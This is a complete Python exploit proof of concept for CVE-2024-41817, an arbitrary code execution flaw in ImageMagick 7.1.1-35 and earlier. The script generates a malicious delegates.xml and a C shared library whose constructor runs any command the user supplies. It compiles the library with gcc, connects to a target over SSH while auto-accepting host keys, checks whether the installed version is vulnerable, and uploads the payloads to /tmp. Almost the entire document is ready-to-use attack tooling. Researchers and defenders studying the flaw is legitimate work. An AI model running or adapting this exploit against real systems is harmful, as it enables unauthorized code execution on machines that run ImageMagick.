4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
"""
Exploit Title : CVE-2024-41817 POC ImageMagick <= 7.1.1-35 Arbitrary Code Execution
Date : 2025-03-18
Source : https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8
Vulnerable version : <= 7.1.1-35
Author : Daihyxsk
Github: https://github.com/Dxsk/CVE-2024-41817-poc/
Tested on : Ubuntu 22.04.5 LTS
With: ImageMagick 7.1.1-35
CVE: CVE-2024-41817 
Python version: 3.11
Python Requirements :
    - Paramiko (only for auto detection and auto exploit)
Gcc version: >= 9.4.0 
"""

from typing import Tuple
import re
import os
import time
import shutil
import argparse
from pathlib import Path


class ImageMagickExploit:
    """
    Generate exploit payloads for the ImageMagick vulnerability.

    Creates either a malicious delegates.xml file or a crafted library file
    with the specified command to be executed on the target system.

    Attributes:
        command: Command string interpolated verbatim into the generated files.
        output_dir: Directory that receives the generated files ("out",
            relative to the current working directory).
    """

    def __init__(self, cmd: str):
        self.command: str = cmd
        self.output_dir: Path = Path("out")

    def create_out_dir(self) -> None:
        """Create output directory if it doesn't exist."""
        # `debug` is a module-level flag assigned by main().
        if debug:
            print(f"[!] Creating {self.output_dir} directory")
        self.output_dir.mkdir(exist_ok=True)

    def delegate_generator(self) -> None:
        """Generate a delegates.xml file with the command specified.

        Raises:
            SystemExit: with status 1 if the file is missing after the write.
        """
        # NOTE: self.command is inserted as-is (no XML escaping is applied).
        content: str = f'<delegatemap><delegate xmlns="" decode="XML" command="{self.command}"/></delegatemap>'
        self.create_out_dir()

        delegate_path = self.output_dir / "delegates.xml"
        delegate_path.write_text(content)

        if not delegate_path.exists():
            print("[!] Error while creating payload")
            raise SystemExit(1)
        print(f"[!] Payload created in \"{delegate_path.absolute()}\"")

    def lib_generator(self) -> None:
        """Write the C source for the library to ``output_dir/libxcb.so``.

        The file holds C *source* until build_payload() replaces it with the
        compiled shared object of the same name.
        """
        # NOTE: self.command is inserted as-is (no C string escaping is applied).
        content: str = f"""#include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>

        __attribute__((constructor)) void init(){{
            system(\"{self.command}\");
            exit(0);
        }}
        """.strip()
        # Drop the indentation inherited from this Python source file.
        content = '\n'.join(line.lstrip() for line in content.splitlines())
        self.create_out_dir()

        lib_path = self.output_dir / "libxcb.so"
        lib_path.write_text(content)

    def build_payload(self) -> bool:
        """Compile the shared library with gcc using -shared and -fPIC options.

        Reads the C source from ``output_dir/libxcb.so``, compiles it to
        ``output_dir/libxcb.so.1`` and, on success, renames the result over
        the source file.

        Returns:
            True if gcc exited with status 0 and the compiled file replaced
            the source; False on any compilation or filesystem failure.

        Raises:
            SystemExit: with status 1 if gcc is not found on PATH.
        """
        # Local import: subprocess is not among the file-level imports.
        import subprocess

        if not shutil.which("gcc"):
            print("[!] gcc not found in the attacker machine")
            raise SystemExit(1)

        source_file = self.output_dir / "libxcb.so"
        output_file = self.output_dir / "libxcb.so.1"
        # "-x c" is required because the source file has a .so extension.
        compile_argv = [
            "gcc", "-x", "c", "-shared", "-fPIC",
            str(source_file), "-o", str(output_file),
        ]

        print("[*] Compiling shared library with gcc...")
        if debug:
            print(f"[*] Executing command: {' '.join(compile_argv)}")

        try:
            completed = subprocess.run(compile_argv, check=False)
        except OSError as e:
            print(f"[!] Compilation error: {str(e)}")
            return False

        # Trust gcc's exit status first: a leftover libxcb.so.1 from an
        # earlier run must not be mistaken for a fresh build.
        if completed.returncode != 0 or not output_file.exists():
            print("[!] Failed to compile the shared library")
            return False

        try:
            output_file.chmod(0o755)
            print(f"[+] Shared library successfully compiled: {output_file}")
            output_file.rename(source_file)
        except OSError as e:
            print(f"[!] Compilation error: {str(e)}")
            return False

        print(f"[+] Shared library ready to use: {source_file}")
        return True


class SshConnection:
    """
    Manage the SSH session used against the target system.

    Checks whether the remote ImageMagick version falls in the affected
    range and uploads the files found in ./out/ to /tmp/ on the remote host.

    Attributes:
        host, port, username, password: Parameters handed to paramiko's
            ``SSHClient.connect``.
        ssh: The paramiko client; None until ``_paramiko_init`` has run.
    """

    # paramiko is imported lazily by _paramiko_init() so that the module can
    # be imported (and build-only mode used) without paramiko installed.
    paramiko = None

    # Last affected release as (major, minor, patch, build): "<= 7.1.1-35".
    _LAST_VULNERABLE = (7, 1, 1, 35)

    def __init__(
        self,
        host: str,
        username: str,
        password: str,
        port: int,
    ):
        self.host: str = host
        self.port: int = port
        self.username: str = username
        self.password: str = password
        self.ssh = None

    def _paramiko_init(self) -> None:
        """Import paramiko on first use and create a fresh SSH client.

        Raises:
            SystemExit: with status 1 if paramiko is not installed.
        """
        if debug:
            print("[*] Initializing paramiko")

        if self.paramiko is None:
            try:
                import paramiko
            except ImportError:
                print("[!] Paramiko is required for SSH features (pip install paramiko)")
                raise SystemExit(1) from None
            SshConnection.paramiko = paramiko

        self.ssh = self.paramiko.SSHClient()
        # Unknown host keys are accepted automatically.
        self.ssh.set_missing_host_key_policy(self.paramiko.AutoAddPolicy())

    def _connect(self) -> None:
        """Open the SSH session with 10-second connect/banner/auth timeouts."""
        self.ssh.connect(
            self.host,
            self.port,
            self.username,
            self.password,
            timeout=10,
            banner_timeout=10,
            auth_timeout=10,
        )

    def _close(self) -> None:
        """Close the SSH client if one has been created."""
        if self.ssh:
            self.ssh.close()

    def _exec_command(self, command: str) -> Tuple[object, str, str]:
        """Execute a command on the remote system.

        Returns:
            ``(stdin, output, error)`` where ``stdin`` is the channel object
            returned by paramiko and the other two are decoded text.

        Raises:
            SystemExit: with status 1 (after closing the client) on any error.
        """
        try:
            # NOTE(review): with get_pty=True the remote stderr is expected to
            # arrive on stdout, leaving `error` empty - confirm.
            stdin, stdout, stderr = self.ssh.exec_command(command, get_pty=True)
            time.sleep(2)
            output = stdout.read().decode()
            error = stderr.read().decode()
        except Exception as e:
            print(f"[!] Unexpected error: {str(e)}")
            self._close()
            raise SystemExit(1)
        return (stdin, output, error)

    def _whereis_magick(self, whereis_output: str) -> str:
        """Parse the output of 'whereis magick' to find ImageMagick path.

        Returns:
            The first path listed after the ``magick:`` label.

        Raises:
            SystemExit: with status 1 if the label or any path is missing.
        """
        if debug:
            print("[*] Searching for ImageMagick")

        if not whereis_output or "magick:" not in whereis_output:
            print("[!] ImageMagick could not be located")
            self._close()
            raise SystemExit(1)

        paths = whereis_output.split("magick:")[1].strip().split()
        if debug:
            print(f"[*] Output of 'whereis magick': {paths}")

        if not paths:
            print("[!] No valid path for ImageMagick was found")
            self._close()
            raise SystemExit(1)

        if len(paths) == 1:
            print(f"[+] Path of ImageMagick: {paths[0]}")
        else:
            print("[!] Multiple paths for ImageMagick found, using the first one")
            print(f"[*] Paths: {', '.join(paths)}")
        return paths[0]

    def _check_version(self, output: str) -> None:
        """
        Check if the ImageMagick version is vulnerable.

        Parses version string like:
        "Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org"

        Raises:
            SystemExit: with status 1 if no version number can be parsed.
        """
        version_match = re.search(r'ImageMagick (\d+)\.(\d+)\.(\d+)-(\d+)', output)

        if not version_match:
            print("[!] Error while checking ImageMagick version")
            raise SystemExit(1)

        version = tuple(map(int, version_match.groups()))
        major, minor, patch, build = version

        print(f"[+] ImageMagick version: {major}.{minor}.{patch}-{build}")

        # Tuples compare lexicographically, so e.g. 7.0.11-50 and 6.9.13-40
        # are correctly ordered before 7.1.1-35; comparing each component on
        # its own would misclassify them.
        if version <= self._LAST_VULNERABLE:
            print("[+] ImageMagick version is vulnerable")
        else:
            print("[!] ImageMagick version is not vulnerable")

    def _query_version(self) -> str:
        """Run ``magick --version`` remotely, retrying once via ``whereis``.

        Returns:
            The raw command output containing the version banner.

        Raises:
            SystemExit: with status 1 on error output, empty output, or when
                the binary is still not found after the ``whereis`` retry.
        """
        magick = 'magick'

        # Two attempts at most: the bare command, then the located path.
        for attempt in (1, 2):
            _, output, error = self._exec_command(f"{magick} --version")

            if error:
                print("[!] Error while checking ImageMagick version")
                print(f"[!] Error details: {error}")
                raise SystemExit(1)

            if not output:
                print("[!] No output received from command")
                raise SystemExit(1)

            if "command not found" not in output:
                return output

            if attempt == 2:
                break

            print("[!] The 'magick' command was not found")
            print("[*] Attempting to locate ImageMagick with 'whereis'...")
            _, whereis_output, _ = self._exec_command("whereis magick")
            magick = self._whereis_magick(whereis_output)

        print("[!] ImageMagick could not be located")
        raise SystemExit(1)

    def check_image_magick_version(self) -> None:
        """Connect to target and check if ImageMagick is vulnerable.

        Raises:
            SystemExit: with status 1 on connection, authentication or
                command failures.
        """
        if debug:
            print("[!] Checking ImageMagick version")
            print(f"[*] Connecting to {self.host}:{self.port} as {self.username}")

        self._paramiko_init()

        try:
            self._connect()
        except self.paramiko.AuthenticationException:
            print("[!] Authentication failed. Please check your credentials.")
            raise SystemExit(1)
        except self.paramiko.SSHException as e:
            print(f"[!] SSH error: {e}")
            raise SystemExit(1)
        except Exception as e:
            print(f"[!] Connection error: {e}")
            raise SystemExit(1)

        if debug:
            print("[*] Connected successfully, executing command")

        try:
            output = self._query_version()
        finally:
            # Release the session on every path, including SystemExit.
            self._close()

        self._check_version(output)

    def send_payload(self) -> bool:
        """Send the generated payloads to the /tmp/ directory of the target machine.

        Returns:
            True only if every file in ./out/ was uploaded and its name
            appeared in the remote ``ls`` output; False if there was nothing
            to send, a transfer could not be verified, or an error occurred.
        """
        self._paramiko_init()
        sftp = None

        try:
            if debug:
                print("[*] Creating an SFTP connection")

            self._connect()
            sftp = self.ssh.open_sftp()

            # Check files to send
            out_dir = Path("out")
            payload_files = [f for f in out_dir.iterdir() if f.is_file()]
            if debug:
                print(f"[*] Payload files: {payload_files}")

            if not payload_files:
                print("[!] No payload found in the ./out/ directory")
                return False

            all_sent = True
            for file_path in payload_files:
                remote_path = f"/tmp/{file_path.name}"

                if debug:
                    print(f"[*] Sending {file_path} to {remote_path}")

                sftp.put(str(file_path), remote_path)

                # Verify file was successfully sent
                _, output, _ = self._exec_command(f"ls -la {remote_path}")
                if debug:
                    print(f"[*] Output of 'ls -la {remote_path}': \n{output}\r")
                if file_path.name in output:
                    print(f"[+] Payload {file_path.name} successfully sent to /tmp/")
                else:
                    print(f"[!] Failed to send payload {file_path.name}")
                    all_sent = False

            return all_sent

        except Exception as e:
            print(f"[!] Error while sending payloads: {str(e)}")
            return False
        finally:
            # Always release the SFTP channel and the SSH session.
            if sftp is not None:
                sftp.close()
            self._close()


class ArgParser:
    """
    Parse command line arguments for the ImageMagick exploit.

    This script exploits CVE-2024-41817 in ImageMagick versions <= 7.1.1-35
    allowing arbitrary code execution via malicious XML delegation.

    Usage examples:

    # Autodetect:
        python3 exploit.py -H $TARGET -p $PORT -u $USER -P $PASSWORD -d
    # Build payload:
        python3 exploit.py -c "id" -B
    # Full (detect, build and push):
        python3 exploit.py -c "id" -H $TARGET -p $PORT -u $USER -P $PASSWORD -A
    """

    # NOTE: the class docstring above is user-facing text (it is read through
    # __doc__ and printed as the usage message), so keep implementation notes
    # in comments like this one rather than in the docstring.

    def __init__(self, argv: "list[str] | None" = None):
        # argv: argument list to parse; None (the default) makes argparse
        # read sys.argv[1:], which is the original behaviour.
        self.parser = argparse.ArgumentParser(description="ImageMagick Exploit")
        self.parser.add_argument("-c", "--command", type=str, help="Command to execute")
        self.parser.add_argument("-H", "--host", type=str, help="Host")
        # No argparse default here: a missing port stays None.
        self.parser.add_argument("-p", "--port", type=int, help="Port (default port 22)")
        self.parser.add_argument("-u", "--username", type=str, help="Username")
        self.parser.add_argument("-P", "--password", type=str, help="Password")
        self.parser.add_argument("-d", "--detection", action="store_true", help="Auto-detect ImageMagick if vulnerable")
        self.parser.add_argument("-B", "--build", action="store_true", help="Only build the payload with the command specified")
        self.parser.add_argument("-A", "--auto", action="store_true", help="Check, Build and Push the payload to the target")
        self.parser.add_argument("-v", "--verbose", action="store_true", help="Verbose mode to display more information during execution")
        self.args = self.parser.parse_args(argv)

    def get_args(self):
        # Returns the argparse.Namespace produced in __init__.
        return self.args


def check_port(args) -> int:
    """Resolve the SSH port from the parsed arguments.

    Returns ``args.port`` when one was supplied; otherwise falls back to 22,
    announcing the fallback when the module-level ``debug`` flag is set.
    """
    requested = args.port
    if requested is not None:
        return requested

    if debug:
        print("[!] Default ssh port used (22)")
    return 22


def check_command(args) -> str:
    """Resolve the command to embed in the payload.

    Returns ``args.command`` when one was supplied; otherwise falls back to
    ``"id"``, announcing the fallback when the module-level ``debug`` flag
    is set.
    """
    requested = args.command
    if requested is not None:
        return requested

    if debug:
        print("[*] No command specified, using 'id' as default")
    return "id"


def build(args) -> None:
    """Build the payload with the specified command.

    Writes delegates.xml and the library source, then compiles the library.

    Raises:
        SystemExit: with status 1 if the compile step reports failure, so
            callers never continue with an uncompiled library file.
    """
    print("[!] Building payload")
    command = check_command(args)
    exploit = ImageMagickExploit(command)
    exploit.delegate_generator()
    exploit.lib_generator()
    # build_payload() returns False on failure; do not ignore it, otherwise
    # out/libxcb.so would still contain the C source text.
    if not exploit.build_payload():
        print("[!] Aborting: the payload was not built")
        raise SystemExit(1)


def detection(args) -> None:
    """Check if target is vulnerable to the exploit.

    Validates that host, username and password were supplied, then opens an
    SSH session and runs the remote ImageMagick version check.

    Raises:
        SystemExit: with status 1 if host, username or password is missing.
    """
    # Validate first: the debug output below slices the credentials and
    # would raise TypeError on None values.
    if not args.host or not args.username or not args.password:
        print("[!] Host, username and password are required for auto detection")
        raise SystemExit(1)

    if debug:
        print("[*] Host, username and password:")
        # The password is fully masked; no part of it is echoed.
        print("[*]", args.host, args.username[:3] + '...', '***')

    port = check_port(args)
    ssh = SshConnection(
        host=args.host,
        port=port,
        username=args.username,
        password=args.password
    )
    ssh.check_image_magick_version()


def auto(args) -> None:
    """Run the three stages in order: detection, build, then upload.

    Each stage is announced when the module-level ``debug`` flag is set.
    """
    print("[!] Auto mode")

    # Detection and build share the same shape: optional banner, then call.
    stages = (
        ("[!] Starting detection", detection),
        ("[!] Starting build", build),
    )
    for banner, stage in stages:
        if debug:
            print(banner)
        stage(args)

    if debug:
        print("[!] Starting push")
    resolved_port = check_port(args)
    connection = SshConnection(
        host=args.host,
        port=resolved_port,
        username=args.username,
        password=args.password
    )

    if debug:
        print("[!] Sending payload")
    connection.send_payload()


def main() -> None:
    """Parse the command line and dispatch to the selected mode.

    Modes are checked in priority order: build (-B), detection (-d), then
    auto (-A). With no mode flag the ArgParser docstring is printed as usage
    text. Also initialises the module-level ``debug`` flag from -v.
    """
    global debug
    debug = False

    cli = ArgParser()
    usage_text = cli.__doc__
    args = cli.get_args()

    if args.verbose:
        print("[Debug] enabled")
        debug = True

    if args.build:
        print("[!] Mode build only")
        build(args)
        return

    if args.detection:
        print("[!] Mode detection only")
        detection(args)
        return

    if not args.auto:
        # No mode selected: show the usage examples.
        print(usage_text)
        return

    print("[!] Mode auto, detection, build and push the payload to the target")
    if not (args.host and args.username and args.password):
        print("[!] Host, username and password are required for auto detection")
        exit(1)

    auto(args)


# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()